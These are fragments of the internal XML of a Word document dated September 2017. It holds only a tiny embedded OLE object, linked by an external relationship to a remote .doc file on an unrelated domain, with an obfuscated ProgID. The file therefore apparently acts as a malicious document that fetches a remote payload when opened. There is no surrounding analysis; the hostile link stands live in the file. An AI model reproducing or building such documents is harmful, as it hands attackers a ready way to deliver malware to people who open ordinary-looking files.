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0E" w:rsidRPr="0094487F" w:rsidRDefault="0094487F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t/>
        <w:object w:dxaOrig="41412" w:dyaOrig="45166">
          <v:shape id="_id_1656" style="width:14.1pt;height:14.7pt" o:ole=""/>
          <o:OLEObject Type="Link" ProgID="bheRled9zFGEzf4xccvWqWdKwvi" r:id="_id_2972" ShapeID="_id_1656">
            <o:LinkType>EnhancedMetaFile</o:LinkType>
            <o:LockedField>false</o:LockedField>
            <o:FieldCodes>\f 0</o:FieldCodes>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00143E0E" w:rsidRPr="0094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36"/>
    <w:rsid w:val="00143E0E"/>
    <w:rsid w:val="00185BB5"/>
    <w:rsid w:val="0094487F"/>
    <w:rsid w:val="00A1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_id_2972" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" TargetMode="External" Target="https://www.protectiadatelor.biz/js/Seun1/seun.doc"/></Relationships>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dotm.dotm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2017-09-24T17:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-09-24T17:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>